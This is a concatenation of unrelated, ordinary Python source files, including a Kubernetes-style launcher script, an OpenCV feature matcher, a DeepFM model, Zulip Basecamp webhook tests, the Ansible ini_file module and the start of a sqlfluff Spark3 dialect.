childopts=childopts, isBackgroundRun="false") def kube(args): """ kubectl kube """ pass childopts = get_client_customopts() + get_exclude_jars() print ("childopts=") print (childopts) exec_jkubernetes_class( "org.gwisoft.jkubernetes.daemon.kube.KubeServer", jvmtype="-server -Xms256m -Xmx256m", sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE], args=args, childopts=childopts, isBackgroundRun="true") def kubelet(args): """ kubectl kubelet """ pass childopts = get_client_customopts() + get_exclude_jars() print ("childopts=") print (childopts) exec_jkubernetes_class( "org.gwisoft.jkubernetes.daemon.kubelet.Kubelet", jvmtype="-server -Xms256m -Xmx256m", sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE], args=args, childopts=childopts, isBackgroundRun="true") def delete(args): """ kubectl delete -f ***.yaml """ pass args = parse_client_createopts(args) childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts() print ("childopts=") print (childopts) exec_jkubernetes_class( "org.gwisoft.jkubernetes.kubectl.KubectlDelete", jvmtype="-server -Xms256m -Xmx256m", sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE], args=args, childopts=childopts, isBackgroundRun="false") def rollingUpdate(args): """ kubectl rolling-update [old topology name] -f ***.yaml """ pass args = parse_client_createopts(args) childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts() print ("childopts=") print (childopts) exec_jkubernetes_class( "org.gwisoft.jkubernetes.kubectl.KubectlRollingUpdate", jvmtype="-server -Xms256m -Xmx256m", sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE], args=args, childopts=childopts, isBackgroundRun="false") def replace(args): """ kubectl replace -f ***.yaml """ pass args = parse_client_createopts(args) childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts() print ("childopts=") print (childopts) exec_jkubernetes_class( "org.gwisoft.jkubernetes.kubectl.KubectlReplace", jvmtype="-server -Xms256m -Xmx256m", sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE], args=args, childopts=childopts, isBackgroundRun="false") def get(args): """ kubectl get po [topology name] """ pass childopts = get_client_customopts() + get_exclude_jars() print ("childopts=") print (childopts) exec_jkubernetes_class( "org.gwisoft.jkubernetes.kubectl.KubectlGet", jvmtype="-server -Xms256m -Xmx256m", sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE], args=args, childopts=childopts, isBackgroundRun="false") def get_client_createopts(): ret = (" -Dkubernetes.create.yaml=" + JKUBERNETES_CREATE_YAML_PATH + " -Dkubernetes.apiserver.address=" + API_SERVER_ADDRESS) return ret def parse_client_createopts(args): print ("parse_client_createopts=") print (args) curr = args curr.reverse() args_list = [] while len(curr) > 0: token = curr.pop() print (token == "-f") if token == "-f": global JKUBERNETES_CREATE_YAML_PATH JKUBERNETES_CREATE_YAML_PATH = curr.pop() else: args_list.append(token) print (args_list) return args_list def exec_jkubernetes_class(klass, jvmtype="-server", sysdirs=[], args=[], childopts="",isBackgroundRun=""): args_str = " ".join(args) command = "java " + " -Dkubernetes.home=" + JKUBERNETES_DIR + " " + get_config_opts() + " " + childopts + " -cp " + get_classpath(sysdirs) + " " + klass + " " + args_str print ("Running: " + command) global STATUS STATUS = os.execvp("java", filter_array(command.split(" "))) #系统自定义的配置入参 def get_client_customopts(): ret = ("") """ ret = (" -Dkubernetes.root.logger=INFO,stdout -Dlogback.configurationFile=" + JKUBERNETES_DIR + "/conf/client_logback.xml -Dlog4j.configuration=File:" + JKUBERNETES_DIR + "/conf/client_log4j.properties") """ return ret def get_classpath(extrajars): ret = [] ret.extend(extrajars) ret.extend(get_jars_full(JKUBERNETES_DIR)) ret.extend(get_jars_full(JKUBERNETES_DIR + "/lib")) ret.extend(INCLUDE_JARS) return normclasspath(":".join(ret)) def main(): if len(sys.argv) <= 1: print_usage() sys.exit(-1) global CONFIG_OPTS config_list, args = parse_config_opts_and_args(sys.argv[1:]) parse_config_opts(config_list) COMMAND = args[0] ARGS = args[1:] if COMMANDS.get(COMMAND) == None: unknown_command(COMMAND) sys.exit(-1) if len(ARGS) != 0 and ARGS[0] == "help": print_usage(COMMAND) sys.exit(0) try: (COMMANDS.get(COMMAND,"help"))(ARGS) except Exception as msg: print(msg) print_usage(COMMAND) sys.exit(-1) sys.exit(STATUS) COMMANDS = {"create": create,"kube":kube,"kubelet":kubelet,"delete":delete,"rolling-update":rollingUpdate,"replace":replace,"get":get} if __name__ == "__main__": #check_java() main()
import cv2 import numpy as np from matplotlib import pyplot as plt from .log import logger MATCHER_DEBUG = False FLANN_INDEX_KDTREE = 0 GOOD_DISTANCE_LIMIT = 0.7 SIFT = cv2.SIFT_create() def is_in_poly(p, poly): """ :param p: [x, y] :param poly: [[], [], [], [], ...] :return: """ px, py = p is_in = False for i, corner in enumerate(poly): next_i = i + 1 if i + 1 < len(poly) else 0 x1, y1 = corner x2, y2 = poly[next_i] if (x1 == px and y1 == py) or (x2 == px and y2 == py): # if point is on vertex is_in = True break if min(y1, y2) < py <= max(y1, y2): # find horizontal edges of polygon x = x1 + (py - y1) * (x2 - x1) / (y2 - y1) if x == px: # if point is on edge is_in = True break elif x > px: # if point is on left-side of line is_in = not is_in return is_in class FlannBasedMatcher(): def __init__(self, origin): self.origin = origin self.kp, self.des = SIFT.detectAndCompute(origin, None) logger.debug(f'FlannBasedMatcher init: shape ({origin.shape})') def match(self, query, ret_square=True, draw=False, scope=None): if self.des is None: logger.debug('feature points is None') if ret_square: return None return False if scope is not None: logger.debug(f'before: {len(self.kp)}') logger.debug(f'scope: {scope}') kp0, des0 = [], [] for kp, des in zip(self.kp, self.des): if scope[0][0] <= kp.pt[0] and scope[0][1] <= kp.pt[1] and kp.pt[0] <= scope[1][0] and kp.pt[1] <= scope[1][1]: kp0.append(kp) des0.append(des) logger.debug(f'after: {len(kp0)}') kp0, des0 = np.array(kp0), np.array(des0) else: kp0, des0 = self.kp, self.des h, w = query.shape kp, des = SIFT.detectAndCompute(query, None) index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5) search_params = dict(checks=50) flann = cv2.FlannBasedMatcher(index_params, search_params) matches = flann.knnMatch(des, des0, k=2) """store all the good matches as per Lowe's ratio test.""" good = [] for x, y in matches: if x.distance < GOOD_DISTANCE_LIMIT * y.distance: good.append(x) """draw the result""" if draw: result = cv2.drawMatches( query, kp, self.origin, kp0, good, None) plt.imshow(result, 'gray') plt.show() if len(good) <= 4 or len(good) / len(des) < 0.2: logger.debug( f'not enough good matches are found: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)}') if ret_square: return None return False """get the coordinates of good matches""" src_pts = np.float32( [kp[m.queryIdx].pt for m in good]).reshape(-1, 1, 2) dst_pts = np.float32( [kp0[m.trainIdx].pt for m in good]).reshape(-1, 1, 2) """calculated transformation matrix and the mask""" M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0) matchesMask = mask.ravel().tolist() if M is None: logger.debug('calculated transformation matrix failed') if ret_square: return None return False pts = np.float32([[0, 0], [0, h-1], [w-1, h-1], [w-1, 0]]).reshape(-1, 1, 2) dst = cv2.perspectiveTransform(pts, M) dst_list = np.int32(dst).reshape(4, 2).tolist() better = filter(lambda m: is_in_poly( kp0[m.trainIdx].pt, dst_list), good) better_kp_x = [kp[m.queryIdx].pt[0] for m in better] if len(better_kp_x): good_area_rate = np.ptp(better_kp_x) / w else: good_area_rate = 0 """draw the result""" if draw or MATCHER_DEBUG: origin = np.array(self.origin) cv2.polylines(origin, [np.int32(dst)], True, 0, 2, cv2.LINE_AA) draw_params = dict(matchColor=( 0, 255, 0), singlePointColor=None, matchesMask=matchesMask, flags=2) result = cv2.drawMatches( query, kp, origin, kp0, good, None, **draw_params) plt.imshow(result, 'gray') plt.show() if abs(dst[0][0][0] - dst[1][0][0]) > 30 or abs(dst[2][0][0] - dst[3][0][0]) > 30 or abs(dst[0][0][1] - dst[3][0][1]) > 30 or abs(dst[1][0][1] - dst[2][0][1]) > 30: logger.debug(f'square is not rectangle: {dst_list}') if ret_square: return None return False if good_area_rate < 0.5: logger.debug(f'good_area_rate is not enough: {good_area_rate}') if ret_square: return None return False logger.info( f'matches: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)} / {good_area_rate}') logger.debug(f'find in {dst_list}') if ret_square: return dst_list return True
# -*- coding:utf-8 -*- """ Author: Weichen Shen,[email protected] Reference: [1] Guo H, Tang R, Ye Y, et al. Deepfm: a factorization-machine based neural network for ctr prediction[J]. arXiv preprint arXiv:1703.04247, 2017.(https://arxiv.org/abs/1703.04247) """ import tensorflow as tf from ..input_embedding import preprocess_input_embedding, get_linear_logit from ..layers.core import PredictionLayer, DNN from ..layers.interaction import FM from ..layers.utils import concat_fun from ..utils import check_feature_config_dict def DeepFM(feature_dim_dict, embedding_size=8, use_fm=True, dnn_hidden_units=(128, 128), l2_reg_linear=0.00001, l2_reg_embedding=0.00001, l2_reg_dnn=0, init_std=0.0001, seed=1024, dnn_dropout=0, dnn_activation='relu', dnn_use_bn=False, task='binary'): """Instantiates the DeepFM Network architecture. :param feature_dim_dict: dict,to indicate sparse field and dense field like {'sparse':{'field_1':4,'field_2':3,'field_3':2},'dense':['field_4','field_5']} :param embedding_size: positive integer,sparse feature embedding_size :param use_fm: bool,use FM part or not :param dnn_hidden_units: list,list of positive integer or empty list, the layer number and units in each layer of DNN :param l2_reg_linear: float. L2 regularizer strength applied to linear part :param l2_reg_embedding: float. L2 regularizer strength applied to embedding vector :param l2_reg_dnn: float. L2 regularizer strength applied to DNN :param init_std: float,to use as the initialize std of embedding vector :param seed: integer ,to use as random seed. :param dnn_dropout: float in [0,1), the probability we will drop out a given DNN coordinate. :param dnn_activation: Activation function to use in DNN :param dnn_use_bn: bool. Whether use BatchNormalization before activation or not in DNN :param task: str, ``"binary"`` for binary logloss or ``"regression"`` for regression loss :return: A Keras model instance. """ check_feature_config_dict(feature_dim_dict) deep_emb_list, linear_emb_list, dense_input_dict, inputs_list = preprocess_input_embedding(feature_dim_dict, embedding_size, l2_reg_embedding, l2_reg_linear, init_std, seed, create_linear_weight=True) linear_logit = get_linear_logit(linear_emb_list, dense_input_dict, l2_reg_linear) fm_input = concat_fun(deep_emb_list, axis=1) deep_input = tf.keras.layers.Flatten()(fm_input) fm_out = FM()(fm_input) deep_out = DNN(dnn_hidden_units, dnn_activation, l2_reg_dnn, dnn_dropout, dnn_use_bn, seed)(deep_input) deep_logit = tf.keras.layers.Dense( 1, use_bias=False, activation=None)(deep_out) if len(dnn_hidden_units) == 0 and use_fm == False: # only linear final_logit = linear_logit elif len(dnn_hidden_units) == 0 and use_fm == True: # linear + FM final_logit = tf.keras.layers.add([linear_logit, fm_out]) elif len(dnn_hidden_units) > 0 and use_fm == False: # linear + Deep final_logit = tf.keras.layers.add([linear_logit, deep_logit]) elif len(dnn_hidden_units) > 0 and use_fm == True: # linear + FM + Deep final_logit = tf.keras.layers.add([linear_logit, fm_out, deep_logit]) else: raise NotImplementedError output = PredictionLayer(task)(final_logit) model = tf.keras.models.Model(inputs=inputs_list, outputs=output) return model
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class PyWidgetsnbextension(PythonPackage): """IPython HTML widgets for Jupyter""" homepage = "https://pypi.python.org/pypi/widgetsnbextension" url = "https://pypi.io/packages/source/w/widgetsnbextension/widgetsnbextension-1.2.6.tar.gz" version('1.2.6', '0aa4e152c9ba2d704389dc2453f448c7') depends_on('py-setuptools', type='build') depends_on('[email protected]:2.8,3.3:') depends_on('[email protected]:', type=('build', 'run'))
from zerver.lib.test_classes import WebhookTestCase TOPIC = "Zulip HQ" class BasecampHookTests(WebhookTestCase): STREAM_NAME = "basecamp" URL_TEMPLATE = "/api/v1/external/basecamp?stream={stream}&api_key={api_key}" FIXTURE_DIR_NAME = "basecamp" def test_basecamp_makes_doc_active(self) -> None: expected_message = "Tomasz activated the document [New doc](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)." self._send_and_test_message("doc_active", expected_message) def test_basecamp_makes_doc_archived(self) -> None: expected_message = "Tomasz archived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)." self._send_and_test_message("doc_archived", expected_message) def test_basecamp_makes_doc_changed_content(self) -> None: expected_message = "Tomasz changed content of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)." self._send_and_test_message("doc_content_changed", expected_message) def test_basecamp_makes_doc_changed_title(self) -> None: expected_message = "Tomasz changed title of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)." self._send_and_test_message("doc_title_changed", expected_message) def test_basecamp_makes_doc_publicized(self) -> None: expected_message = "Tomasz publicized the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)." self._send_and_test_message("doc_publicized", expected_message) def test_basecamp_makes_doc_created(self) -> None: expected_message = "Tomasz created the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)." self._send_and_test_message("doc_created", expected_message) def test_basecamp_makes_doc_trashed(self) -> None: expected_message = "Tomasz trashed the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)." self._send_and_test_message("doc_trashed", expected_message) def test_basecamp_makes_doc_unarchived(self) -> None: expected_message = "Tomasz unarchived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)." self._send_and_test_message("doc_unarchive", expected_message) def test_basecamp_makes_questions_answer_archived(self) -> None: expected_message = "Tomasz archived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question?](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)" self._send_and_test_message("questions_answer_archived", expected_message) def test_basecamp_makes_questions_answer_content_changed(self) -> None: expected_message = "Tomasz changed content of the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("questions_answer_content_changed", expected_message) def test_basecamp_makes_questions_answer_created(self) -> None: expected_message = "Tomasz created the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("questions_answer_created", expected_message) def test_basecamp_makes_questions_answer_trashed(self) -> None: expected_message = "Tomasz trashed the [answer](https://3.basecamp.com/3688623/buckets/2957043/question_answers/432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("questions_answer_trashed", expected_message) def test_basecamp_makes_questions_answer_unarchived(self) -> None: expected_message = "Tomasz unarchived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("questions_answer_unarchived", expected_message) def test_basecamp_makes_question_archived(self) -> None: expected_message = "Tomasz archived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("question_archived", expected_message) def test_basecamp_makes_question_created(self) -> None: expected_message = "Tomasz created the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("question_created", expected_message) def test_basecamp_makes_question_trashed(self) -> None: expected_message = "Tomasz trashed the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("question_trashed", expected_message) def test_basecamp_makes_question_unarchived(self) -> None: expected_message = "Tomasz unarchived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)." self._send_and_test_message("question_unarchived", expected_message) def test_basecamp_makes_message_archived(self) -> None: expected_message = "Tomasz archived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)." self._send_and_test_message("message_archived", expected_message) def test_basecamp_makes_message_content_change(self) -> None: expected_message = "Tomasz changed content of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)." self._send_and_test_message("message_content_changed", expected_message) def test_basecamp_makes_message_created(self) -> None: expected_message = "Tomasz created the message [Message Title](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)." self._send_and_test_message("message_created", expected_message) def test_basecamp_makes_message_title_change(self) -> None: expected_message = "Tomasz changed subject of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)." self._send_and_test_message("message_title_changed", expected_message) def test_basecamp_makes_message_trashed(self) -> None: expected_message = "Tomasz trashed the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)." self._send_and_test_message("message_trashed", expected_message) def test_basecamp_makes_message_unarchived(self) -> None: expected_message = "Tomasz unarchived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)." self._send_and_test_message("message_unarchived", expected_message) def test_basecamp_makes_todo_list_created(self) -> None: expected_message = "Tomasz created the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)." self._send_and_test_message("todo_list_created", expected_message) def test_basecamp_makes_todo_list_description_changed(self) -> None: expected_message = "Tomasz changed description of the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)." self._send_and_test_message("todo_list_description_changed", expected_message) def test_basecamp_makes_todo_list_modified(self) -> None: expected_message = "Tomasz changed name of the todo list [NEW Name TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)." self._send_and_test_message("todo_list_name_changed", expected_message) def test_basecamp_makes_todo_assignment_changed(self) -> None: expected_message = "Tomasz changed assignment of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)." self._send_and_test_message("todo_assignment_changed", expected_message) def test_basecamp_makes_todo_completed(self) -> None: expected_message = "Tomasz completed the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)." self._send_and_test_message("todo_completed", expected_message) def test_basecamp_makes_todo_uncompleted(self) -> None: expected_message = "Tomasz uncompleted the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)." self._send_and_test_message("todo_uncompleted", expected_message) def test_basecamp_makes_todo_created(self) -> None: expected_message = "Tomasz created the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)." self._send_and_test_message("todo_created", expected_message) def test_basecamp_makes_todo_due_on_changed(self) -> None: expected_message = "Tomasz changed due_on of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)." self._send_and_test_message("todo_due_on_changed", expected_message) def test_basecamp_makes_comment_created(self) -> None: expected_message = "Tomasz created the [comment](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624#__recording_427058780) of the task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)." self._send_and_test_message("comment_created", expected_message) def _send_and_test_message(self, fixture_name: str, expected_message: str) -> None: self.check_webhook(fixture_name, TOPIC, expected_message)
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2012, Jan-Piet Mens <jpmens () gmail.com> # Copyright: (c) 2015, Ales Nosek <anosek.nosek () gmail.com> # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type DOCUMENTATION = r''' --- module: ini_file short_description: Tweak settings in INI files extends_documentation_fragment: files description: - Manage (add, remove, change) individual settings in an INI-style file without having to manage the file as a whole with, say, M(ansible.builtin.template) or M(ansible.builtin.assemble). - Adds missing sections if they don't exist. - Before Ansible 2.0, comments are discarded when the source file is read, and therefore will not show up in the destination file. - Since Ansible 2.3, this module adds missing ending newlines to files to keep in line with the POSIX standard, even when no other modifications need to be applied. options: path: description: - Path to the INI-style file; this file is created if required. - Before Ansible 2.3 this option was only usable as I(dest). type: path required: true aliases: [ dest ] section: description: - Section name in INI file. This is added if C(state=present) automatically when a single value is being set. - If left empty or set to C(null), the I(option) will be placed before the first I(section). - Using C(null) is also required if the config format does not support sections. type: str required: true option: description: - If set (required for changing a I(value)), this is the name of the option. - May be omitted if adding/removing a whole I(section). type: str value: description: - The string value to be associated with an I(option). - May be omitted when removing an I(option). type: str backup: description: - Create a backup file including the timestamp information so you can get the original file back if you somehow clobbered it incorrectly. type: bool default: no state: description: - If set to C(absent) the option or section will be removed if present instead of created. type: str choices: [ absent, present ] default: present no_extra_spaces: description: - Do not insert spaces before and after '=' symbol. type: bool default: no create: description: - If set to C(no), the module will fail if the file does not already exist. - By default it will create the file if it is missing. type: bool default: yes allow_no_value: description: - Allow option without value and without '=' symbol. type: bool default: no notes: - While it is possible to add an I(option) without specifying a I(value), this makes no sense. - As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well. author: - Jan-Piet Mens (@jpmens) - Ales Nosek (@noseka1) ''' EXAMPLES = r''' # Before Ansible 2.3, option 'dest' was used instead of 'path' - name: Ensure "fav=lemonade is in section "[drinks]" in specified file community.general.ini_file: path: /etc/conf section: drinks option: fav value: lemonade mode: '0600' backup: yes - name: Ensure "temperature=cold is in section "[drinks]" in specified file community.general.ini_file: path: /etc/anotherconf section: drinks option: temperature value: cold backup: yes ''' import os import re import tempfile import traceback from ansible.module_utils.basic import AnsibleModule def match_opt(option, line): option = re.escape(option) return re.match('( |\t)*%s( |\t)*(=|$)' % option, line) \ or re.match('#( |\t)*%s( |\t)*(=|$)' % option, line) \ or re.match(';( |\t)*%s( |\t)*(=|$)' % option, line) def match_active_opt(option, line): option = re.escape(option) return re.match('( |\t)*%s( |\t)*(=|$)' % option, line) def do_ini(module, filename, section=None, option=None, value=None, state='present', backup=False, no_extra_spaces=False, create=True, allow_no_value=False): diff = dict( before='', after='', before_header='%s (content)' % filename, after_header='%s (content)' % filename, ) if not os.path.exists(filename): if not create: module.fail_json(rc=257, msg='Destination %s does not exist !' % filename) destpath = os.path.dirname(filename) if not os.path.exists(destpath) and not module.check_mode: os.makedirs(destpath) ini_lines = [] else: ini_file = open(filename, 'r') try: ini_lines = ini_file.readlines() finally: ini_file.close() if module._diff: diff['before'] = ''.join(ini_lines) changed = False # ini file could be empty if not ini_lines: ini_lines.append('\n') # last line of file may not contain a trailing newline if ini_lines[-1] == "" or ini_lines[-1][-1] != '\n': ini_lines[-1] += '\n' changed = True # append fake section lines to simplify the logic # At top: # Fake random section to do not match any other in the file # Using commit hash as fake section name fake_section_name = "ad01e11446efb704fcdbdb21f2c43757423d91c5" # Insert it at the beginning ini_lines.insert(0, '[%s]' % fake_section_name) # At botton: ini_lines.append('[') # If no section is defined, fake section is used if not section: section = fake_section_name within_section = not section section_start = 0 msg = 'OK' if no_extra_spaces: assignment_format = '%s=%s\n' else: assignment_format = '%s = %s\n' for index, line in enumerate(ini_lines): if line.startswith('[%s]' % section): within_section = True section_start = index elif line.startswith('['): if within_section: if state == 'present': # insert missing option line at the end of the section for i in range(index, 0, -1): # search backwards for previous non-blank or non-comment line if not re.match(r'^[ \t]*([#;].*)?$', ini_lines[i - 1]): if not value and allow_no_value: ini_lines.insert(i, '%s\n' % option) else: ini_lines.insert(i, assignment_format % (option, value)) msg = 'option added' changed = True break elif state == 'absent' and not option: # remove the entire section del ini_lines[section_start:index] msg = 'section removed' changed = True break else: if within_section and option: if state == 'present': # change the existing option line if match_opt(option, line): if not value and allow_no_value: newline = '%s\n' % option else: newline = assignment_format % (option, value) option_changed = ini_lines[index] != newline changed = changed or option_changed if option_changed: msg = 'option changed' ini_lines[index] = newline if option_changed: # remove all possible option occurrences from the rest of the section index = index + 1 while index < len(ini_lines): line = ini_lines[index] if line.startswith('['): break if match_active_opt(option, line): del ini_lines[index] else: index = index + 1 break elif state == 'absent': # delete the existing line if match_active_opt(option, line): del ini_lines[index] changed = True msg = 'option changed' break # remove the fake section line del ini_lines[0] del ini_lines[-1:] if not within_section and option and state == 'present': ini_lines.append('[%s]\n' % section) if not value and allow_no_value: ini_lines.append('%s\n' % option) else: ini_lines.append(assignment_format % (option, value)) changed = True msg = 'section and option added' if module._diff: diff['after'] = ''.join(ini_lines) backup_file = None if changed and not module.check_mode: if backup: backup_file = module.backup_local(filename) try: tmpfd, tmpfile = tempfile.mkstemp(dir=module.tmpdir) f = os.fdopen(tmpfd, 'w') f.writelines(ini_lines) f.close() except IOError: module.fail_json(msg="Unable to create temporary file %s", traceback=traceback.format_exc()) try: module.atomic_move(tmpfile, filename) except IOError: module.ansible.fail_json(msg='Unable to move temporary \ file %s to %s, IOError' % (tmpfile, filename), traceback=traceback.format_exc()) return (changed, backup_file, diff, msg) def main(): module = AnsibleModule( argument_spec=dict( path=dict(type='path', required=True, aliases=['dest']), section=dict(type='str', required=True), option=dict(type='str'), value=dict(type='str'), backup=dict(type='bool', default=False), state=dict(type='str', default='present', choices=['absent', 'present']), no_extra_spaces=dict(type='bool', default=False), allow_no_value=dict(type='bool', default=False), create=dict(type='bool', default=True) ), add_file_common_args=True, supports_check_mode=True, ) path = module.params['path'] section = module.params['section'] option = module.params['option'] value = module.params['value'] state = module.params['state'] backup = module.params['backup'] no_extra_spaces = module.params['no_extra_spaces'] allow_no_value = module.params['allow_no_value'] create = module.params['create'] (changed, backup_file, diff, msg) = do_ini(module, path, section, option, value, state, backup, no_extra_spaces, create, allow_no_value) if not module.check_mode and os.path.exists(path): file_args = module.load_file_common_arguments(module.params) changed = module.set_fs_attributes_if_different(file_args, changed) results = dict( changed=changed, diff=diff, msg=msg, path=path, ) if backup_file is not None: results['backup_file'] = backup_file # Mission complete module.exit_json(**results) if __name__ == '__main__': main()
from flask import request, jsonify import json from urllib import parse as urlparse import time import sys import sqlite3 from dnfp import app, apputils from inventory import Inventory from skilltree import SkillTree from character import Character from libutil import LibUtil as myutil def get_neople_ids(name, server): server_dict={'안톤':'anton','바칼':'bakal','카인':'cain','카시야스':'casillas', '디레지에':'diregie','힐더':'hilder','프레이':'prey','시로코':'siroco'} s_id=server_dict[server] cha_id_url = 'servers/'+s_id+'/characters?characterName='+urlparse.quote(name)+'&' try: cha_id_dic=myutil.load_api(cha_id_url) except: raise cha_id=cha_id_dic['rows'][0]['characterId'] return s_id, cha_id def create_char_json(s_id, cha_id, test_mode = False, epic_status = False): character = Character(cha_id, s_id, test_mode, custom_data = None) if character.status[0] != 'ok': return character.status[1] character.do_create_char_dict(epic_status, None) return character.char_stat def make_char_stat(s_id, cha_id, test_mode = False, epic_status = True): char_stat = create_char_json(s_id, cha_id, test_mode = test_mode, epic_status = epic_status) return char_stat @app.route("/char", methods=("GET", "POST")) def char_stat(): name = request.args.get("name") server = request.args.get("server") sid, cid = get_neople_ids(name, server) char_stat = make_char_stat(sid, cid, test_mode = False, epic_status = False) return jsonify(char_stat)
from django.db import models from django.contrib.auth.models import User class SessionTable(models.Model): sess_id = models.CharField(max_length=15) name = models.CharField(max_length=15) class VoteTable(models.Model): value = models.IntegerField() user = models.ForeignKey(User, on_delete=models.CASCADE) sess_id = models.OneToOneField(SessionTable, on_delete=models.CASCADE) class SessionResults(models.Model): value = models.IntegerField() user = models.ForeignKey(User, on_delete=models.CASCADE)
"""The Spark SQL dialect for ANSI Compliant Spark3. Inherits from ANSI. Spark SQL ANSI Mode is more restrictive regarding keywords than the Default Mode, and still shares some syntax with hive. Based on: - https://spark.apache.org/docs/latest/sql-ref.html - https://spark.apache.org/docs/latest/sql-ref-ansi-compliance.html - https://github.com/apache/spark/blob/master/sql/catalyst/src/main/antlr4/org/apache/spark/sql/catalyst/parser/SqlBase.g4 """ from sqlfluff.core.parser import ( AnyNumberOf, BaseSegment, Bracketed, CommentSegment, Conditional, Dedent, Delimited, Indent, NamedParser, OneOf, OptionallyBracketed, Ref, RegexLexer, Sequence, StringParser, SymbolSegment, Anything, ) from sqlfluff.core.dialects import load_raw_dialect from sqlfluff.core.parser.segments.raw import CodeSegment, KeywordSegment from sqlfluff.dialects.dialect_spark3_keywords import ( RESERVED_KEYWORDS, UNRESERVED_KEYWORDS, ) ansi_dialect = load_raw_dialect("ansi") hive_dialect = load_raw_dialect("hive") spark3_dialect = ansi_dialect.copy_as("spark3") spark3_dialect.patch_lexer_matchers( [ # Spark SQL, only -- is used for single-line comment RegexLexer( "inline_comment", r"(--)[^\n]*", CommentSegment, segment_kwargs={"trim_start": "--"}, ), # == and <=> are valid equal operations # <=> is a non-null equals in Spark SQL # https://spark.apache.org/docs/latest/api/sql/index.html#_10 RegexLexer("equals", r"=|==|<=>", CodeSegment), # identifiers are delimited with ` # within a delimited identifier, ` is used to escape special characters, including ` # Ex: select `delimited `` with escaped` from `just delimited` # https://spark.apache.org/docs/latest/sql-ref-identifier.html#delimited-identifier RegexLexer("back_quote", r"`([^`]|``)*`", CodeSegment), ] ) # Set the bare functions spark3_dialect.sets("bare_functions").clear() spark3_dialect.sets("bare_functions").update( [ "CURRENT_DATE", "CURRENT_TIMESTAMP", "CURRENT_USER", ] ) # Set the datetime units spark3_dialect.sets("datetime_units").clear() spark3_dialect.sets("datetime_units").update( [ "YEAR", # Alternate syntax for YEAR "YYYY", "YY", "QUARTER", "MONTH", # Alternate syntax for MONTH "MON", "MM", "WEEK", "DAY", # Alternate syntax for DAY "DD", "HOUR", "MINUTE", "SECOND", ] ) # Set Keywords spark3_dialect.sets("unreserved_keywords").update(UNRESERVED_KEYWORDS) spark3_dialect.sets("reserved_keywords").update(RESERVED_KEYWORDS) # Set Angle Bracket Pairs spark3_dialect.sets("angle_bracket_pairs").update( [ ("angle", "StartAngleBracketSegment", 